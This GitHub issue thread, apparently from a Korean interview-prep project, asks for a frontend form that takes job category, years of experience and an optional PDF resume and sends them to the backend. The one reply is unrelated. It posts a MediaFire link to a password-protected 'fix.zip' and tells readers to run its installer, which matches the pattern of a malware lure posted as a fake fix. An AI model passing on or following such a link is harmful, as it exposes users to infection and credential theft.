### ISSUE TITLE
[question][LLm] 프론트엔드에서 정보 받아서 백엔드에서 통신

### ISSUE THREAD

**Issue by KUYESUNG** [InterviewExplorer/InterviewExplorer_front#2]
## 🌱 문제 제기
프론트엔드에서 직업군, 연차, 이력서(선택)을 입력받아서 백엔드랑 통신해야함

## 🌱 기능 내용
직업군은 select
연차는 input
이력서는 pdf

## 🌱 할 일
- [ ] 각 정보 받기
- [ ] 전송 버튼 누르면 해당 정보 백으로 넘겨서 질문 받아오기

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
